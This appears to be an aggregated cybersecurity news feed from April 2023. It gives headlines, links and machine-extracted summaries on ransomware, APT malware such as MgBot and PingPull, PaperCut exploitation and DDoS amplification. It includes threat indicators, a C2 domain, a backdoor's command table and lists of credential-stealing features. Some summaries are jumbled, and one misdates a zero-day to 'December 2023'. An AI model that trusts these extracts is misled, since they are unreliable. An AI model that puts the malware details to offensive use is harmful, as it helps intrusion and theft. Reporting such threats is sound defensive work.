                Remote Access Trojans (RATs) have taken the third leading position in ANY.RUN's Q1 2023 report on the most prevalent malware types, making it highly probable that your organization may face this threat. Though LimeRAT might not be the most well-known RAT family, its versatility is what sets it apart. Capable of carrying out a broad spectrum of malicious activities, it excels not only in data "

                Autosummary: TA0005: Defense Evasion / T1027: Obfuscated Files or Information: malware uses the Base64 algorithm to encode and decode data. TA0005: Defense Evasion / T1027: Obfuscated Files or Information: malware uses the AES algorithm to encrypt and decrypt data. ANY.RUN is running a limited-time offer, celebrating its 7th Cyberbirthday. ANY.RUN is an interactive cloud malware sandbox that can extract malware configs automatically for numerous families, saving researchers hours of effort. If you discover that ANY.RUN enhances your malware analysis workflow, they are also offering a limited promotion, available until May 5th: receive 6 or 12 months of free usage when you sign up for a yearly or two-year subscription, respectively. "


                CryptoRom: OkCupid scam cost Florida man $480k – we followed the money to Binance

                financial
                2023-04-27 https://securityaffairs.com/145369/cyber-crime/cryptorom-okcupid-scam-florida-man.html

                CyberNews analyzed a classic cryptocurrency romance scam, also known as CryptoRom, explaining how scammers hid the money. CryptoRom scammers hid the money with several layers of obfuscation, but the Cybernews research team discovered that the stolen funds ended up in Binance accounts. A man from Florida in the US recently reached out to Cybernews for […]

                The post CryptoRom: OkCupid scam cost Florida man $480k – we followed the money to Binance appeared first on Security Affairs.

                "

                Autosummary: If you want to know how to avoid such kind of scams, give a look at the original post: Original post at https://cybernews.com/security/okcupid-scam-florida-man-binance/ About the author: Vilius Petkauskas, Senior Journalist at CyberNews "


                Google banned 173K developer accounts to block malware, fraud rings

                exploits
                2023-04-27 https://www.bleepingcomputer.com/news/google/google-banned-173k-developer-accounts-to-block-malware-fraud-rings/
                Google says it banned 173,000 developer accounts in 2022 to block malware operations and fraud rings from infecting Android users' devices with malicious apps. [...] "

                Autosummary: "


                Linux version of RTM Locker ransomware targets VMware ESXi servers

                exploits ransomware
                2023-04-27 https://www.bleepingcomputer.com/news/security/linux-version-of-rtm-locker-ransomware-targets-vmware-esxi-servers/
                RTM Locker is the latest enterprise-targeting ransomware operation found to be deploying a Linux encryptor that targets virtual machines on VMware ESXi servers. [...] "

                Autosummary: BleepingComputer has seen this with almost all enterprise-targeting ransomware operations, including Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX, Hive, and now, RTM Locker. "


                Charming Kitten targets critical infrastructure in US and elsewhere with BellaCiao malware

                exploits
                2023-04-27 https://www.tripwire.com/state-of-security/charming-kitten-targets-critical-infrastructure-us-and-elsewhere-bellaciao
                Iranian state-sponsored hacking group Charming Kitten has been named as the group responsible for a new wave of attacks targeting critical infrastructure in the United States and elsewhere. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Crooks use PaperCut exploits to deliver Cl0p and LockBit ransomware

                exploits ransomware
                2023-04-27 https://securityaffairs.com/145377/hacking/papercut-exploits-cl0p-lockbit-ransomware.html

                Microsoft revealed that recent attacks against PaperCut servers aimed at distributing Cl0p and LockBit ransomware. Microsoft linked the recent attacks against PaperCut servers to a financially motivated threat actor tracked as Lace Tempest (formerly DEV-0950). The group is known to be an affiliate of the Clop ransomware RaaS affiliate, it has been linked to GoAnywhere attacks and […]

                The post Crooks use PaperCut exploits to deliver Cl0p and LockBit ransomware appeared first on Security Affairs.

                "

                Autosummary: "


                Overcoming industry obstacles for decentralized digital identities

                industry
                2023-04-26 https://www.helpnetsecurity.com/2023/04/26/eve-maler-forgerock-decentralized-digital-identities/

                In this Help Net Security interview, Eve Maler, CTO at ForgeRock, talks about how digital identities continue to play a critical role in how we access online services securely. Maler also highlights the challenges encountered by various industries in implementing decentralized digital identities. What challenges do decentralized digital identity systems face, and how can they be overcome? Decentralized identity is a nascent area, and we’re at an exciting moment in time where decentralized digital identities … More

                The post Overcoming industry obstacles for decentralized digital identities appeared first on Help Net Security.

                "

                Autosummary: People will be able to get a credential one day – and then, the next day or week or year, be able to convincingly tell a service provider that they’ve already been proven to be old enough, or that they have a license to drive, or what have you. One of the strongest examples of implementation of decentralized digital identity systems is the mobile driver’s license (mDL) movement in the US. For context, an mDL is a driver license (or ID card) stored in secure digital form on a mobile device with the capability to be queried in real time in a privacy-sensitive fashion. Third, ensure that the parts of the decentralized identity systems that have to do with security and privacy are robustly implemented, so that the promises made by decentralized identity today can be realized. Digital identity wallets attempt to decentralize identity information, that is, literally to put that data “on the edge” in the form of individuals’ wallets. "


                New coercive tactics used to extort ransomware payments

                exploits ransomware industry
                2023-04-26 https://www.helpnetsecurity.com/2023/04/26/q1-2023-ransomware-victims/

                The increase in reported ransomware victims across Q1 2023 reflects the continued prevalence of ransomware as a worldwide, industry agnostic threat, according to GuidePoint Security. The report is based on data obtained from publicly available resources, including threat groups themselves, and insight into the ransomware threat landscape. In the first quarter, GRIT tracked 849 total publicly posted ransomware victims claimed by 29 different threat groups. Increase in public ransomware victims GRIT’s latest report shows a … More

                The post New coercive tactics used to extort ransomware payments appeared first on Help Net Security.

                "

                Autosummary: While manufacturing and technology continue to be the most impacted sectors, observed victims in the legal industry increased 65% from Q4 2022 to Q1 2023, from 23 to 38, with 70% consistently attributed to the most prolific “double-extortion” model ransomware groups – LockBit, AlphV, Royal, and BlackBasta. "


                Apache Superset Vulnerability: Insecure Default Configuration Exposes Servers to RCE Attacks

                exploits
                2023-04-26 https://thehackernews.com/2023/04/apache-superset-vulnerability-insecure.html
                The maintainers of the Apache Superset open source data visualization software have released fixes to plug an insecure default configuration that could lead to remote code execution. The vulnerability, tracked as CVE-2023-27524 (CVSS score: 8.9), impacts versions up to and including 2.0.1 and relates to the use of a default SECRET_KEY that could be abused by attackers to authenticate and access "

                Autosummary: Naveen Sunkavally, the chief architect at Horizon3.ai, described the issue as "a dangerous default configuration in Apache Superset that allows an unauth attacker to gain remote code execution, harvest credentials, and compromise data. "


                Chinese hackers use new Linux malware variants for espionage

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/security/chinese-hackers-use-new-linux-malware-variants-for-espionage/
                Hackers are deploying new Linux malware variants in cyberespionage attacks, such as a new PingPull variant and a previously undocumented backdoor tracked as "Sword2033." [...] "

                Autosummary: The parameters and corresponding commands are: A – Get the current directory; B – List folder; C – Read text file; D – Write a text file; E – Delete file or folder; F – Read binary file, convert to hex; G – Write binary file, convert to hex; H – Copy file or folder; I – Rename a file; J – Create a directory; K – Timestamp file with a specified timestamp in "%04d-%d-%d %d:%d:%d" format; M – Run command. Unit 42 comments that the command handlers used in PingPull match those observed in another malware named "China Chopper," a web shell seen heavily used in attacks against Microsoft Exchange servers. "


                Charming Kitten's New BellaCiao Malware Discovered in Multi-Country Attacks

                exploits government
                2023-04-26 https://thehackernews.com/2023/04/charming-kittens-new-bellaciao-malware.html
                The prolific Iranian nation-state group known as Charming Kitten targeted multiple victims in the U.S., Europe, the Middle East and India with a novel malware dubbed BellaCiao, adding to its ever-expanding list of custom tools. Discovered by Bitdefender Labs, BellaCiao is a "personalized dropper" that's capable of delivering other malware payloads onto a victim machine based on commands received "

                Autosummary: Charming Kitten, also known as APT35, Cobalt Illusion, Educated Manticore, ITG18, Mint Sandstorm (née Phosphorus), TA453, and Yellow Garuda, is an Iranian state-sponsored APT group associated with the Islamic Revolutionary Guard Corps (IRGC). "


                Chinese Hackers Using MgBot Malware to Target International NGOs in Mainland China

                exploits
                2023-04-26 https://thehackernews.com/2023/04/chinese-hackers-using-mgbot-malware-to.html
                The advanced persistent threat (APT) group referred to as Evasive Panda has been observed targeting an international non-governmental organization (NGO) in Mainland China with malware delivered via update channels of legitimate applications like Tencent QQ. The attack chains are designed to distribute a Windows installer for MgBot malware, ESET security researcher Facundo Muñoz said in a new "

                Autosummary: Evasive Panda, also known as Bronze Highland and Daggerfly, is a Chinese-speaking APT group that has been attributed to a series of cyber espionage attacks targeting various entities in China, Hong Kong, and other countries located in East and South Asia since at least late December 2012. "


                Evasive Panda APT group delivers malware via updates for popular Chinese software

                exploits
                2023-04-26 https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/

                ESET Research uncovers a campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software

                The post Evasive Panda APT group delivers malware via updates for popular Chinese software appeared first on WeLiveSecurity

                "

                Autosummary: (Table 1 residue: ASNs AS58542, AS56040, AS4811; updater binaries QQUrlMgr.exe, QQ.exe, QQLive.exe, QQCall<XX>.exe; resolved IPs 183.232.96[.]107, 61.129.7[.]35.) Hypotheses of compromise: when we analyzed the likelihood of several methods that could explain how the attackers managed to deliver malware through legitimate updates, we were left with two scenarios: supply-chain compromise, and adversary-in-the-middle attacks. Government entities were targeted in China, Macao, and Southeast and East Asian countries, specifically Myanmar, the Philippines, Taiwan, and Vietnam, while other organizations in China and Hong Kong were also targeted. Steals credentials from Chrome, Opera, Firefox, Foxmail, QQBrowser, FileZilla, and WinSCP, among others. In Table 1, we provide the URL from where the download originated, according to ESET telemetry data, including the IP addresses of the servers, as resolved at the time by the user’s system; therefore, we believe that these IP addresses are legitimate. Supply-chain compromise scenario: given the targeted nature of the attacks, we speculate that attackers would have needed to compromise the QQ update servers to introduce a mechanism to identify the targeted users to deliver them the malware, filtering out non-targeted users and delivering them legitimate updates – we registered cases where legitimate updates were downloaded through the same abused protocols. Toolset: MgBot. MgBot is the primary Windows backdoor used by Evasive Panda, which according to our findings has existed since at least 2012 and, as mentioned in this blog post, was publicly documented at VirusBulletin in 2014. Deobfuscated, the complete update check URL is: http://c.gj.qq[.]com/fcgi-bin/busxml?busid=20&supplyid=30088&guid=CQEjCF9zN8Zdyzj5S6F1MC1RGUtw82B7yL+hpt9/gixzExnawV3y20xaEdtektfo&dm=0 The server responds with XML-formatted data encoded with base64 and encrypted with an implementation of the TEA algorithm using a 128-bit key. Similar to what we observed on this cluster of Evasive Panda victims, their researchers found that, since 2020, victims of LuoYu had received the WinDealer malware through updates via the legitimate application qgametool.exe from the PPTV software, also developed by a Chinese company. Wrap-up: ultimately, without further evidence, we cannot prove or discard one hypothesis in favor of the other, given that such capabilities are at hand for Chinese APT groups. "


                Tencent QQ users hacked in mysterious malware attack, says ESET

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/security/tencent-qq-users-hacked-in-mysterious-malware-attack-says-eset/
                The Chinese APT hacking group known as "Evasive Panda" are behind a mysterious attack that distributed the MsgBot malware as part of an automatic update for the Tencent QQ messaging app. [...] "

                Autosummary: MgBot uses a modular architecture to extend its functionality, receiving DLL plugins from the C2 that perform specialized functions, including: keylogging on specific Tencent apps; stealing files from hard drives and USB pen drives; capturing text copied to the clipboard; capturing input and output audio streams; stealing credentials from Outlook and Foxmail email clients; stealing credentials from Chrome, Opera, Firefox, Foxmail, QQBrowser, FileZilla, WinSCP, and more; stealing the content of the Tencent QQ database that stores the user's message history; stealing information from Tencent WeChat; stealing cookies from Firefox, Chrome, and Edge. In conclusion, the Evasive Panda APT was found targeting users in China, aiming to steal data mostly from Chinese apps, leveraging an unclear method to perform a supply chain attack on Tencent QQ software. "


                Google disrupts the CryptBot info-stealing malware operation

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/security/google-disrupts-the-cryptbot-info-stealing-malware-operation/
                Google is taking down malware infrastructure linked to the Cryptbot info stealer after suing those using it to infect Google Chrome users and steal their data. [...] "

                Autosummary: "Yesterday, a federal judge in the Southern District of New York unsealed our civil action against the malware distributors of Cryptbot, which we estimate infected approximately 670,000 computers this past year and targeted users of Google Chrome to steal their data," the Head of Litigation Advance Mike Trinh and Threat Analysis Group's Pierre-Marc Bureau said. "


                Microsoft removes LSA Protection from Windows settings to fix bug

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-lsa-protection-from-windows-settings-to-fix-bug/
                Microsoft has fixed a known issue triggering Windows Security warnings that Local Security Authority (LSA) Protection is off by removing the feature's UI from settings. [...] "

                Autosummary: LSA Protection enabled (BleepingComputer). Kernel-mode Hardware-enforced Stack Protection warnings: as BleepingComputer reported last week, after the LSA Protection UI was removed from the Windows Security > Device Security > Core Isolation settings page, users are now seeing similar alerts, this time warning them that their devices may be vulnerable because Kernel-mode Hardware-enforced Stack Protection (HSP) is off due to conflicting drivers. "


                Cybersecurity leaders introduced open-source information sharing to help OT community

                ciber
                2023-04-26 https://www.helpnetsecurity.com/2023/04/26/ethos-open-source-platform/

                A group of OT cybersecurity leaders and critical infrastructure defenders introduced their plans for ETHOS (Emerging THreat Open Sharing), an open-source, vendor-agnostic technology platform for sharing anonymous early warning threat information across industries with peers and governments. Founding ETHOS community members include 1898 & Co., ABS Group, Claroty, Dragos, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable, and Waterfall Security Solutions. ETHOS will give critical industries a vendor-neutral option for information sharing to combat … More

                The post Cybersecurity leaders introduced open-source information sharing to help OT community appeared first on Help Net Security.

                "

                Autosummary: Founding ETHOS community members include 1898 & Co., ABS Group, Claroty, Dragos, Forescout, NetRise, Network Perception, Nozomi Networks, Schneider Electric, Tenable, and Waterfall Security Solutions. “To remain highly vigilant against potential attacks and adversaries, ETHOS provides collective defense through vendor-agnostic information-sharing from both public and private sources that enables improved metrics like time-to-detection and time-to-respond,” said Matt Morris, Managing Director for Security & Risk Consulting at 1898 & Co. “ETHOS is answering the call to protect the nation’s critical infrastructure by tearing down barriers and closing the gap on how we can rapidly respond to new and emerging threats impacting the safety and security of industrial operations. "


                Chinese Hackers Spotted Using Linux Variant of PingPull in Targeted Cyberattacks

                ciber
                2023-04-26 https://thehackernews.com/2023/04/chinese-hackers-using-pingpull-linux.html
                The Chinese nation-state group dubbed Alloy Taurus is using a Linux variant of a backdoor called PingPull as well as a new undocumented tool codenamed Sword2033. That's according to findings from Palo Alto Networks Unit 42, which discovered recent malicious cyber activity carried out by the group targeting South Africa and Nepal. Alloy Taurus is the constellation-themed moniker assigned to a "

                Autosummary: The Linux flavor of the malware boasts of similar functionalities as its Windows counterpart, allowing it to carry out file operations and run arbitrary commands by transmitting from the C2 server a single upper case character between A and K, and M. "Upon execution, this sample is configured to communicate with the domain yrhsywu2009.zapto[.]org over port 8443 for C2," Unit 42 said. "


                Ukrainian arrested for selling data of 300M people to Russians

                rusia-ucrania
                2023-04-26 https://www.bleepingcomputer.com/news/security/ukrainian-arrested-for-selling-data-of-300m-people-to-russians/
                The Ukrainian cyber police have arrested a 36-year-old man from the city of Netishyn for selling the personal data and sensitive information of over 300 million people, citizens of Ukraine, and various European countries. [...] "

                Autosummary: "


                PrestaShop fixes bug that lets any backend user delete databases

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/security/prestashop-fixes-bug-that-lets-any-backend-user-delete-databases/
                The open-source e-commerce platform PrestaShop has released a new version that addresses a critical-severity vulnerability allowing any back-office user to write, update, or delete SQL databases regardless of their permissions. [...] "

                Autosummary: "


                Cisco discloses XSS zero-day flaw in server management tool

                exploits
                2023-04-26 https://www.bleepingcomputer.com/news/security/cisco-discloses-xss-zero-day-flaw-in-server-management-tool/
                Cisco disclosed today a zero-day vulnerability in the company's Prime Collaboration Deployment (PCD) software that can be exploited for cross-site scripting attacks. [...] "

                Autosummary: Fixed-release table for Cisco Prime Collaboration Deployment: Release 14 and earlier, first fixed release 14SU3 (May 2023). Zero-day disclosed in December still waiting for a patch: Cisco also has to patch another high-severity IP Phone zero-day (CVE-2022-20968) with publicly available exploit code, disclosed in early December 2023. "


                China-linked Alloy Taurus APT uses a Linux variant of PingPull malware

                exploits
                2023-04-26 https://securityaffairs.com/145335/apt/alloy-taurus-apt-pingpull-linux-variant.html

                China-linked threat actor tracked as Alloy Taurus is using a Linux variant of the PingPull backdoor and a new tool dubbed Sword2033. Researchers from Palo Alto Networks Unit 42 recently observed the China-linked Alloy Taurus group (aka GALLIUM, Softcell) targeting Linux systems with a new variant of PingPull backdoor. While investigating the activity of the group, the […]

                The post China-linked Alloy Taurus APT uses a Linux variant of PingPull malware appeared first on Security Affairs.

                "

                Autosummary: "


                Clop, LockBit ransomware gangs behind PaperCut server attacks

                exploits ransomware
                2023-04-26 https://www.bleepingcomputer.com/news/security/clop-lockbit-ransomware-gangs-behind-papercut-server-attacks/
                Microsoft has attributed recent attacks on PaperCut servers to the Clop and LockBit ransomware operations, which used the vulnerabilities to steal corporate data. [...] "

                Autosummary: Ransomware gangs behind attacks: today, Microsoft disclosed that the Clop and LockBit ransomware gangs are behind these PaperCut attacks and using them to steal corporate data from vulnerable servers. "


                Update your PaperCut application servers now: Exploits in the wild

                exploits
                2023-04-26 https://www.malwarebytes.com/blog/news/2023/04/update-your-papercut-application-servers-now-exploits-in-the-wild

                Categories: News

                Tags: PaperCut

                Tags: server

                Tags: exploit

                Tags: attack

                Tags: authentication

                Tags: update

                Tags: patch

                We take a look at urgent updates needed for users of PaperCut, after two exploits were found in the wild.

                (Read more...)

                The post Update your PaperCut application servers now: Exploits in the wild appeared first on Malwarebytes Labs.

                "

                Autosummary: Two specific vulnerabilities are at the heart of this alert, and are ranked with severity scores of 9.8 (critical) and 8.2 (high) respectively. If you’re unable to upgrade: PaperCut advises those who are unable to apply the patches to follow the below steps: Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default). Posted: April 26, 2023. "


                Peru’s ‘fast and furious’ blueberry boom

                latam
                2023-04-26 https://www.bbc.co.uk/news/business-65190673?at_medium=RSS&at_campaign=KARANGA
                The South American country has become the world's largest exporter of the berries in only a decade. "

                Autosummary: "


                Microsoft: Clop and LockBit ransomware behind PaperCut server hacks

                exploits ransomware
                2023-04-26 https://www.bleepingcomputer.com/news/security/microsoft-clop-and-lockbit-ransomware-behind-papercut-server-hacks/
                Microsoft has attributed recent attacks on PaperCut servers to the Clop and LockBit ransomware operations, which used the vulnerabilities to steal corporate data. [...] "

                Autosummary: Ransomware gangs behind attacks: today, Microsoft disclosed that the Clop and LockBit ransomware gangs are behind these PaperCut attacks and using them to steal corporate data from vulnerable servers. "


                SentinelOne unveils cybersecurity AI platform

                ciber
                2023-04-25 https://www.helpnetsecurity.com/2023/04/25/sentinelone-ai-platform/

                Cybercriminals around the world are using generative artificial intelligence (AI) to execute malicious attacks that can take down companies and governments. SentinelOne plans to use the same technologies to defeat them. The company has unveiled a threat-hunting platform that integrates multiple layers of AI technology to deliver security capabilities and real-time, autonomous response to attacks across the entire enterprise. The news was announced during RSA Conference 2023, the premier cybersecurity event being held at the … More

                The post SentinelOne unveils cybersecurity AI platform appeared first on Help Net Security.

                "

                Autosummary: An intelligent, action-oriented approach: built on the security data lake, the SentinelOne threat-hunting platform aggregates and correlates information from device and log telemetry across endpoint, cloud, network and user data, and not only delivers insights, but recommends response actions that can be immediately executed – from mitigation and investigation to endpoint, cloud and user management. "


                AI tools help attackers develop sophisticated phishing campaigns

                financial
                2023-04-25 https://www.helpnetsecurity.com/2023/04/25/ai-phishing-campaigns/

                Phishing scams are a growing threat, and cybercriminals’ methods are becoming increasingly sophisticated, making them harder to detect and block, according to a Zscaler report. The report found that a majority of modern phishing attacks rely on stolen credentials and outlined the growing threat from Adversary-in-the-Middle (AitM) attacks, increased use of the InterPlanetary File System (IPFS), as well as reliance on phishing kits sourced from black markets and AI tools like ChatGPT. “Phishing remains one of … More

                The post AI tools help attackers develop sophisticated phishing campaigns appeared first on Help Net Security.

                "

                Autosummary: Zscaler recommends the following best practices to manage phishing risk better: understand the risks to better inform policy and strategy; leverage automated tools and threat intel to reduce phishing incidents; implement zero trust architectures to limit the blast radius of successful attacks; deliver timely training to build security awareness and promote user reporting; simulate phishing attacks to identify gaps in your program. The Zscaler Zero Trust Exchange protects systems from phishing. Industry statistics reveal that the average organization receives a high volume of phishing emails daily, and user compromise is one of the most complex security challenges to defend against. While the U.S. continues to lead the way, the research revealed staggering year-over-year increases in phishing attempts targeting Canada (718%), the U.K. (269%), Russia (199%), and Japan (92%). “Threat actors are leveraging phishing kits & AI tools to launch highly effective e-mail, SMiShing, and Vishing campaigns at scale,” said Deepen Desai, Global CISO and Head of Security, Zscaler. "


                PoC exploit for abused PaperCut flaw is now public (CVE-2023-27350)

                exploits
                2023-04-25 https://www.helpnetsecurity.com/2023/04/25/cve-2023-27350-poc/

                An unauthenticated RCE flaw (CVE-2023-27350) in widely-used PaperCut MF and NG print management software is being exploited by attackers to take over vulnerable application servers, and now there’s a public PoC exploit. About the vulnerability According to PaperCut, the attacks seem to have started on April 14, 2023 – a month and a week after the software maker released new PaperCut MF and NG versions that fixed CVE-2023-27350 and CVE-2023–27351, an unauthenticated information disclosure flaw … More

                The post PoC exploit for abused PaperCut flaw is now public (CVE-2023-27350) appeared first on Help Net Security.

                "

                Autosummary: They just noted that: CVE-2023-27350 exists within the SetupCompleted class, stems from improper access control, and can result in an authentication bypass and remote code execution on vulnerable installations; CVE-2023-27351 exists within the SecurityRequestFilter class, stems from an improper implementation of the authentication algorithm, and can result in an authentication bypass and disclosure of sensitive information. PaperCut says CVE-2023-27350 is being exploited but that they currently have no evidence that CVE-2023-27351 is. "


                North Korea-linked BlueNoroff APT is behind the new RustBucket Mac Malware

                exploits
                2023-04-25 https://securityaffairs.com/145241/hacking/bluenoroff-rustbucket-malware.html

                North Korea-linked APT group BlueNoroff (aka Lazarus) was spotted targeting Mac users with new RustBucket malware. Researchers from security firm Jamf observed the North Korea-linked BlueNoroff APT group using a new macOS malware family, dubbed RustBucket, in recent attacks. BlueNoroff is considered to operate under the control of the notorious North Korea-linked Lazarus APT group. The […]

                The post North Korea-linked BlueNoroff APT is behind the new RustBucket Mac Malware appeared first on Security Affairs.

                "

                Autosummary: "


                TP-Link Archer WiFi router flaw exploited by Mirai malware

                exploits
                2023-04-25 https://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/
                The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms. [...] "

                Autosummary: Figure caption: Mixing legitimate-appearing traffic with garbage requests (ZDI). TP-Link fix: TP-Link first attempted to address the problem on February 24, 2023, but the fix was incomplete and did not prevent exploitation. "


                New SLP Vulnerability Could Let Attackers Launch 2200x Powerful DDoS Attacks

                exploits
                2023-04-25 https://thehackernews.com/2023/04/new-slp-vulnerability-could-let.html
                Details have emerged about a high-severity security vulnerability impacting Service Location Protocol (SLP) that could be weaponized to launch volumetric denial-of-service attacks against targets. "Attackers exploiting this vulnerability could leverage vulnerable instances to launch massive Denial-of-Service (DoS) amplification attacks with a factor as high as 2200 times, potentially making it "

                Autosummary: The top 10 countries with the most organizations having vulnerable SLP instances are the U.S., the U.K., Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain. "


                Modernizing Vulnerability Management: The Move Toward Exposure Management

                exploits
                2023-04-25 https://thehackernews.com/2023/04/modernizing-vulnerability-management.html
                Managing vulnerabilities in the constantly evolving technological landscape is a difficult task. Although vulnerabilities emerge regularly, not all vulnerabilities present the same level of risk. Traditional metrics such as CVSS score or the number of vulnerabilities are insufficient for effective vulnerability management as they lack business context, prioritization, and understanding of "

                Autosummary: To build a modern exposure management program, organizations should recognize the evolution of threat actors and their tactics, establish an operational process for ensuring continuous security posture improvement, and implement a plan consisting of remediation planning, remediation review, risk mitigation and mitigation verification. "


                Lazarus Subgroup Targeting Apple Devices with New RustBucket macOS Malware

                exploits
                2023-04-25 https://thehackernews.com/2023/04/lazarus-subgroup-targeting-apple.html
                A financially-motivated North Korean threat actor is suspected to be behind a new Apple macOS malware strain called RustBucket. "[RustBucket] communicates with command and control (C2) servers to download and execute various payloads," Jamf Threat Labs researchers Ferdous Saljooki and Jaron Bradley said in a technical report published last week.  The Apple device management company attributed it "

                Autosummary: A majority of the files have been submitted to the malware-scanning platform from South Korea, the U.S., Italy, and Israel, and the U.K. "The group uses a variety of techniques and tools to conduct espionage, sabotage, and theft operations, including spear-phishing and credential harvesting," the Google Chronicle subsidiary said. "The actor primarily targets organizations in the U.S. and South Korea, including individuals working within the government, military, manufacturing, academic, and think tank organizations that possess subject matter expertise in defense and security, particularly nuclear security and nonproliferation policy," Google-owned Mandiant noted last year. "


                VMware fixes critical zero-day exploit chain used at Pwn2Own

                exploits
                2023-04-25 https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-zero-day-exploit-chain-used-at-pwn2own/
                VMware has released security updates to address zero-day vulnerabilities that could be chained to gain code execution on systems running unpatched versions of the company’s Workstation and Fusion software hypervisors. [...] "

                Autosummary: The first vulnerability (CVE-2023-20869) is a stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality which allows local attackers to execute code as the virtual machine’s VMX process running on the host. "


                New SLP bug can lead to massive 2,200x DDoS amplification attacks

                exploits
                2023-04-25 https://www.bleepingcomputer.com/news/security/new-slp-bug-can-lead-to-massive-2-200x-ddos-amplification-attacks/
                A new reflective Denial-of-Service (DoS) amplification vulnerability in the Service Location Protocol (SLP) allows threat actors to launch massive denial-of-service attacks with 2,200X amplification. [...] "

                Autosummary: Most vulnerable instances are in the United States, Great Britain, Japan, Germany, Canada, France, Italy, Brazil, the Netherlands, and Spain, owned by several Fortune 1000 companies in technology, telecommunications, healthcare, insurance, finance, hospitality, and transportation. "


                Pro-Russia hackers attack European air traffic control website, but don’t panic! Flights continue as normal

                ransomware
                2023-04-25 https://www.bitdefender.com/blog/hotforsecurity/pro-russia-hackers-attack-european-air-traffic-control-website-but-dont-panic-flights-continue-as-normal/
                Eurocontrol, the European air traffic control agency, has revealed that it has been under cyber attack for the last week, and says that pro-Russian hackers have claimed responsibility for the disruption. When you first see the headline in the likes of the Wall Street Journal, it’s a scary thing to read. But dig a little deeper, and you realise that the err.. sky is not falling. Read more in my article on the Hot for Security blog. "

                Autosummary: Yes, it’s undoubtedly a nuisance for some if Eurocontrol’s website is knocked offline by a DDoS attack, or becomes difficult to access, but the website itself is not used for critical operations that could impact flight safety but is rather a way of sharing public information. "


                VMware addressed two zero-day flaws demonstrated at Pwn2Own Vancouver 2023

                exploits
                2023-04-25 https://securityaffairs.com/145287/security/vmware-fixes-critical-zero-days-pwn2own.html

                VMware addressed zero-day flaws that can be chained to achieve arbitrary code execution on Workstation and Fusion software hypervisors. VMware released security updates to address two zero-day vulnerabilities (CVE-2023-20869, CVE-2023-20870) that were chained by the STAR Labs team during the Pwn2Own Vancouver 2023 hacking contest against Workstation and Fusion software hypervisors. The STAR Labs (@starlabs_sg) […]

                The post VMware addressed two zero-day flaws demonstrated at Pwn2Own Vancouver 2023 appeared first on Security Affairs.

                "

                Autosummary: "


                Black Basta ransomware attacks Yellow Pages Canada

                exploits ransomware
                2023-04-25 https://www.malwarebytes.com/blog/news/2023/04/black-basta-ransomware-attacks-yellow-pages-canada

                Categories: News, Ransomware

                Tags: Yellow Pages, Canada, Black Basta, ransomware

                Yellow Pages Canada has suffered a cyberattack by the Black Basta ransomware group.


                The post Black Basta ransomware attacks Yellow Pages Canada appeared first on Malwarebytes Labs.

                "

                Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Franco Sciannamblo, YP’s Senior Vice President, Chief Financial Officer, commented in a statement to BleepingComputer: “Based on our investigation to date, we have reason to believe that the unauthorized third party stole certain personal information from servers containing YP employee data and limited data relating to our business customers.” After the data is copied, the ransomware encrypts files with the ".basta" extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. "


                Accenture and Google Cloud expand collaboration to accelerate cybersecurity resilience

                ciber
                2023-04-25 https://www.helpnetsecurity.com/2023/04/26/accenture-google-cloud-partnership/

                Accenture and Google Cloud announced an expansion of their global partnership to help businesses better protect critical assets and strengthen security against persistent cyber threats. Together, they are providing the technology, trusted infrastructure, and security expertise organizations need to build resilient security programs and maintain confidence in their readiness. The two companies have partnered since 2018 to help the world’s largest organizations fundamentally improve their businesses by harnessing Google Cloud’s leading technology in data analytics, … More

                The post Accenture and Google Cloud expand collaboration to accelerate cybersecurity resilience appeared first on Help Net Security.

                "

                Autosummary: Security-specific generative AI from Google Cloud: Accenture will be the first company to utilize the Google Cloud Security AI Workbench, an industry-first extensible platform powered by a specialized, security large language model (LLM), Sec-PaLM, that leverages Google’s visibility into the threat landscape and Mandiant’s frontline intelligence on vulnerabilities, malware, threat indicators, and more. "


                Deep Instinct partners with eSentire to protect customers from unknown and zero-day attacks

                exploits
                2023-04-25 https://www.helpnetsecurity.com/2023/04/26/deep-instinct-esentire/

                Deep Instinct announced a new partnership with eSentire to protect eSentire customers from unknown and zero-day attacks. As ransomware and data exfiltration become more prevalent and damaging to businesses, the need for proactive cybersecurity has never been greater. Gartner projects that more than 60 percent of organizations using Endpoint Detection and Response (EDR) will also deploy MDR by 2026. The strategic partnership between Deep Instinct and eSentire will not only enable go-to-market collaboration but will … More

                The post Deep Instinct partners with eSentire to protect customers from unknown and zero-day attacks appeared first on Help Net Security.

                "

                Autosummary: “Having served on a board with Amit and knowing his deep technology skills and understanding of the MSSP/MDR market makes him a natural fit as we further expand our relationships as the best malware prevention choice for MDRs, MSSPs, service providers, and carriers,” said Bess. "


                NetRise raises $8 million to advance XIoT security technology

                industry
                2023-04-25 https://www.helpnetsecurity.com/2023/04/26/netrise-funding/

                NetRise announced $8 million in funding, led by Squadra Ventures, with participation by existing major investors Miramar Digital Ventures, Sorenson Ventures and DNX Ventures. NetRise has developed a cloud-based SaaS platform that analyzes and continuously monitors the firmware of Extended Internet of Things (XIoT) devices. Leading the market as a software supply chain detection & response platform, NetRise enables device manufacturers and enterprise customers to detect, respond to, and prevent threats throughout their supply chains. … More

                The post NetRise raises $8 million to advance XIoT security technology appeared first on Help Net Security.

                "

